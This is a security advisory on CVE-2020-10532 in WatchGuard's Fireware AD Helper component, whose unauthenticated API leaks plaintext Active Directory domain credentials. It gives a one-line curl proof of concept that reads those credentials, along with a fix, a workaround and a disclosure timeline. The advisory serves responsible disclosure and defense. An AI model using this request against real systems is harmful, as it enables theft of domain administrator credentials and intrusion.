Credential Disclosure in WatchGuard Fireware AD Helper Component
RedTeam Pentesting discovered a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
Details
- Product: WatchGuard Fireware AD Helper Component
- Affected Versions: 5.8.5.10233, < 5.8.5.10317
- Fixed Versions: 5.8.5.10317
- Vulnerability Type: Information Disclosure
- Security Risk: high
- Vendor URL:
https://www.watchguard.com/help/docs/fireware/12/en-us/Content/en-US/services/tdr/tdr_ad_helper_c.html
- Vendor Status: fixed version released
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
- Advisory Status: published
- CVE: CVE-2020-10532
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10532
Introduction
“Threat Detection and Response (TDR) is a cloud-based subscription service that integrates with your Firebox to minimize the consequences of data breaches and penetrations through early detection and automated remediation of security threats.”
“Threat Detection and Response includes the AD Helper component. If your network has an Active Directory server, you can install AD Helper to manage automated installation and updates of Host Sensors on your network.”
(from the vendor’s homepage)
More Details
By accessing the AD Helper’s web interface, it was discovered that a call to an API endpoint is made, which responds with plaintext credentials to all configured domain controllers. There is no authentication needed to use the described interface and the installation instructions at (https://www.watchguard.com/help/docs/fireware/12/en-us/Content/en-US/services/tdr/tdr_ad_helper_c.html) contain no indication of any way to configure access control.
Proof of Concept
An HTTP GET request to the path “/domains/list” of the AD Helper API returns, among others, the plaintext credentials to all configured Windows domain controllers:
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
{
"content": [
{
"id": 1,
"fullyQualifiedName": "example.com",
"logonDomain": "example.com",
"domainControllers": "dc1.example.com",
"username": "[DOMAIN_USER]",
"password": "[DOMAIN_PASSWORD]",
"uuid": "[...]",
"servers": [
{
[...]
}
]
}
],
"totalPages": 1,
"totalElements": 1,
"number": 0,
"numberOfElements": 1
}
The same request and its response can be observed when initially accessing the web interface. The discovered version of AD Helper responds with the following server banner:
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
It is likely that other versions of the AD Helper Component are vulnerable as well.
Workaround
Ensure API of the AD Helper Component is not reachable over the network, for example by putting it behind a Firewall.
Fix
Update to Version 5.8.5.10317 or later.
Security Risk
No authentication is needed to access AD Helper’s web interface and the installation instructions at (https://www.watchguard.com/help/docs/fireware/12/en-us/Content/en-US/services/tdr/tdr_ad_helper_c.html) describe that configured domain user accounts must possess at least the following privileges:
- Connect to the host
- Mount the share ADMIN$
- Create a file on the host
- Execute commands on the host
- Install software on the host
Access to the “ADMIN$” share implies a user with administrative privileges. Therefore, this vulnerability poses a high risk.
Timeline
- 2020-02-12 Vulnerability identified
- 2020-02-19 Customer approved disclosure to vendor
- 2020-02-24 Tried to contact the German branch of WatchGuard
- 2020-02-27 Contacted the Dutch branch of WatchGuard
- 2020-02-28 Contact to ADHelper QA Team Lead established
- 2020-03-02 Advisory draft sent for verification
- 2020-03-10 Vendor released fixed version and blog post
- 2020-03-11 CVE ID requested
- 2020-03-11 Advisory released
- 2020-03-13 CVE ID assigned
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/